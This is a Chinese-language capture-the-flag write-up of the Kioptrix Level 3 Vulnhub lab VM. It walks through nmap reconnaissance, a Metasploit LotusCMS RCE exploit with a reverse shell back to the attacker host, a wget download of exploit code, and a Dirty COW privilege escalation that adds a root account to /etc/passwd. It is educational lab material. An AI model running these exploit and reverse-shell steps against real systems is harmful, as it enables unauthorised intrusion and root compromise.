Vulnhub之Kioptrix Level 3靶机详细测试过程
Kioptrix Level 3
作者:jason_huawen
靶机基本信息
名称:Kioptrix: Level 1.2 (#3)
地址:
https://www.vulnhub.com/entry/kioptrix-level-12-3,24/
识别目标主机IP地址
(root💀kali)-[~/vulnhub/Kio_3]
└─# netdiscover -i eth1 -r 10.1.0.0/16
Currently scanning: 10.1.87.0/16 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
10.1.1.1 00:50:56:c0:00:01 1 60 VMware, Inc.
10.1.1.140 00:0c:29:b8:01:0e 1 60 VMware, Inc.
10.1.1.254 00:50:56:f6:e5:92 1 60 VMware, Inc.
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为10.1.1.140
NMAP扫描
──(root💀kali)-[~/vulnhub/Kio_3]
└─# nmap -sS -sV -sC -p- 10.1.1.140 -oN nmap_full_scan 130 ⨯
Starting Nmap 7.91 ( https://nmap.org ) at 2022-12-04 23:45 EST
Nmap scan report for bogon (10.1.1.140)
Host is up (0.0042s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
| 1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_ 2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Ligoat Security - Got Goat? Security ...
MAC Address: 00:0C:29:B8:01:0E (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
NMAP扫描结果表明目标主机有2个开放端口:22(SSH)、80(HTTP)
获得Shell
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# curl http://10.1.1.140/robots.txt
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /robots.txt was not found on this server.</p>
<hr>
<address>Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch Server at 10.1.1.140 Port 80</address>
</body></html>
访问80端口,返回页面中有Login的链接,访问该链接,返回登录页面,同时可知CMS为lotusCMS,尝试是否有SQL注入漏洞,但是没有成功,但是查询lotuscms的漏洞:
──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit lotuscms
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
LotusCMS 3.0 - 'eval()' Remote Command Execution (Metasploit) | php/remote/18565.rb
LotusCMS 3.0.3 - Multiple Vulnerabilities | php/webapps/16982.txt
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
该CMS有远程命令执行漏洞,但是目前还不知道目标主机的CMS的版本,先尝试一下:
msf6 > use exploit/multi/http/lcms_php_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.84.194 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS 10.1.1.140
RHOSTS => 10.1.1.140
msf6 exploit(multi/http/lcms_php_exec) > set URI /
执行失败,但是看了其他人的解法,就是采用如此方法, 再次尝试,发现换另外一种种Payload,就执行成功了!
msf6 > use exploit/multi/http/lcms_php_exec
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI /lcms/ yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.84.194 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set LHOST 10.1.1.128
LHOST => 10.1.1.128
msf6 exploit(multi/http/lcms_php_exec) > set LPORT 5555
LPORT => 5555
msf6 exploit(multi/http/lcms_php_exec) > set URI /
URI => /
msf6 exploit(multi/http/lcms_php_exec) > set RHOSTS 10.1.1.140
RHOSTS => 10.1.1.140
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 10.1.1.128:5555
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Exploit completed, but no session was created.
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.1.1.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.1.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > set payload
set payload generic/custom set payload php/bind_php set payload php/meterpreter/bind_tcp_uuid
set payload generic/shell_bind_tcp set payload php/bind_php_ipv6 set payload php/meterpreter/reverse_tcp
set payload generic/shell_reverse_tcp set payload php/download_exec set payload php/meterpreter/reverse_tcp_uuid
set payload multi/meterpreter/reverse_http set payload php/exec set payload php/reverse_perl
set payload multi/meterpreter/reverse_https set payload php/meterpreter/bind_tcp set payload php/reverse_php
set payload php/bind_perl set payload php/meterpreter/bind_tcp_ipv6
set payload php/bind_perl_ipv6 set payload php/meterpreter/bind_tcp_ipv6_uuid
msf6 exploit(multi/http/lcms_php_exec) > set payload php/reverse_php
payload => php/reverse_php
msf6 exploit(multi/http/lcms_php_exec) > show options
Module options (exploit/multi/http/lcms_php_exec):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.1.1.140 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
URI / yes URI
VHOST no HTTP server virtual host
Payload options (php/reverse_php):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.1.1.128 yes The listen address (an interface may be specified)
LPORT 5555 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic LotusCMS 3.0
msf6 exploit(multi/http/lcms_php_exec) > exploit
[*] Started reverse TCP handler on 10.1.1.128:5555
[*] Using found page param: /index.php?page=index
[*] Sending exploit ...
[*] Command shell session 1 opened (10.1.1.128:5555 -> 10.1.1.140:53808) at 2022-12-05 00:24:03 -0500
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
在Metasploit拿到的这个shell不是很稳定,因此重新spawn一个新的shell
──(root💀kali)-[~]
└─# nc -nlvp 6666
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.1.1.140.
Ncat: Connection from 10.1.1.140:55996.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@Kioptrix3:/home/www/kioptrix3.com$
提权
将linpeas.sh脚本上传至目标主机/tmp目录,修改权限,并执行脚本,脚本输出结果表明,可以利用dirtycow来提权:
cd /tmp
www-data@Kioptrix3:/tmp$ wget http://10.1.1.128:8000/40616.c
wget http://10.1.1.128:8000/40616.c
--08:32:47-- http://10.1.1.128:8000/40616.c
=> `40616.c'
Connecting to 10.1.1.128:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4,963 (4.8K) [text/x-csrc]
100%[====================================>] 4,963 --.--K/s
08:32:47 (1023.37 MB/s) - `40616.c' saved [4963/4963]
www-data@Kioptrix3:/tmp$ gcc -o exploit 40616.c -pthread
gcc -o exploit 40616.c -pthread
40616.c: In function 'procselfmemThread':
40616.c:99: warning: passing argument 2 of 'lseek' makes integer from pointer without a cast
40616.c: In function 'main':
40616.c:142: error: invalid use of undefined type 'struct stat'
40616.c:144: error: invalid use of undefined type 'struct stat'
40616.c:145: error: invalid use of undefined type 'struct stat'
40616.c:148: error: invalid use of undefined type 'struct stat'
40616.c:159:2: warning: no newline at end of file
执行失败,需要另外找可用的漏洞利用代码。
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$ uname -a
uname -a
Linux Kioptrix3 2.6.24-24-server #1 SMP Tue Jul 7 20:21:17 UTC 2009 i686 GNU/Linux
www-data@Kioptrix3:/home/www/kioptrix3.com/data/users$
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit kernel 2.6.24
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Android Kernel < 4.8 - ptrace seccomp Filter Bypass | android/dos/46434.c
Apple iOS < 10.3.1 - Kernel | ios/local/42555.txt
Apple Mac OSX < 10.6.7 - Kernel Panic (Denial of Service) | osx/dos/17901.c
Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method) | linux/local/40839.c
40839.c是可行的
┌──(root💀kali)-[~/vulnhub/Kio_3]
└─# searchsploit -m linux/local/40839.c
Exploit: Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (/etc/passwd Method)
URL: https://www.exploit-db.com/exploits/40839
Path: /usr/share/exploitdb/exploits/linux/local/40839.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /root/vulnhub/Kio_3/40839.c
www-data@Kioptrix3:/tmp$ gcc -pthread -o exploit 40839.c -lcrypt
gcc -pthread -o exploit 40839.c -lcrypt
40839.c:193:2: warning: no newline at end of file
www-data@Kioptrix3:/tmp$ ls
ls
40616.c 40839.c exploit linpeas.sh
www-data@Kioptrix3:/tmp$ chmod +x exploit
chmod +x exploit
www-data@Kioptrix3:/tmp$ ./exploit
./exploit
/etc/passwd successfully backed up to /tmp/passwd.bak
Please enter the new password: 123
Complete line:
firefart:fiRbwOlRgkx7g:0:0:pwned:/root:/bin/bash
mmap: b7fe0000
id
id
su firefart
su firefart
madvise 0
ptrace 0
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
Done! Check /etc/passwd to see if the new user was created.
You can log in with the username 'firefart' and the password '123'.
DON'T FORGET TO RESTORE! $ mv /tmp/passwd.bak /etc/passwd
www-data@Kioptrix3:/tmp$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@Kioptrix3:/tmp$ su firefart
Password: 123
firefart@Kioptrix3:/tmp# cd /tmp
cd /tmp
firefart@Kioptrix3:/tmp# cd /root
cd /root
firefart@Kioptrix3:~# ls -alh
ls -alh
total 52K
drwx------ 5 firefart root 4.0K 2011-04-17 08:59 .
drwxr-xr-x 21 firefart root 4.0K 2011-04-11 16:54 ..
-rw------- 1 firefart root 9 2011-04-18 11:49 .bash_history
-rw-r--r-- 1 firefart root 2.2K 2007-10-20 07:51 .bashrc
-rw-r--r-- 1 firefart root 1.3K 2011-04-16 08:13 Congrats.txt
drwxr-xr-x 12 firefart root 12K 2011-04-16 07:26 ht-2.0.18
-rw------- 1 firefart root 963 2011-04-12 19:33 .mysql_history
-rw------- 1 firefart root 228 2011-04-18 11:09 .nano_history
-rw-r--r-- 1 firefart root 141 2007-10-20 07:51 .profile
drwx------ 2 firefart root 4.0K 2011-04-13 10:06 .ssh
drwxr-xr-x 3 firefart root 4.0K 2011-04-15 23:30 .subversion
firefart@Kioptrix3:~# cat Congrats.txt
cat Congrats.txt
Good for you for getting here.
Regardless of the matter (staying within the spirit of the game of course)
you got here, congratulations are in order. Wasn't that bad now was it.
Went in a different direction with this VM. Exploit based challenges are
nice. Helps workout that information gathering part, but sometimes we
need to get our hands dirty in other things as well.
Again, these VMs are beginner and not intented for everyone.
Difficulty is relative, keep that in mind.
The object is to learn, do some research and have a little (legal)
fun in the process.
I hope you enjoyed this third challenge.
Steven McElrea
aka loneferret
http://www.kioptrix.com
Credit needs to be given to the creators of the gallery webapp and CMS used
for the building of the Kioptrix VM3 site.
Main page CMS:
http://www.lotuscms.org
Gallery application:
Gallarific 2.1 - Free Version released October 10, 2009
http://www.gallarific.com
Vulnerable version of this application can be downloaded
from the Exploit-DB website:
http://www.exploit-db.com/exploits/15891/
The HT Editor can be found here:
http://hte.sourceforge.net/downloads.html
And the vulnerable version on Exploit-DB here:
http://www.exploit-db.com/exploits/17083/
Also, all pictures were taken from Google Images, so being part of the
public domain I used them.
firefart@Kioptrix3:~#
经验教训
-
虽然40839.c与40616.c都是利用dirtycow漏洞,但是前者可以执行成功,后者失败。
-
在拿到shell的过程中,其实选择metasploit的模块是正确的,但是因为payload不同,第一次执行失败,没有拿到shell
STRIVE FOR PROGRESS,NOT FOR PERFECTION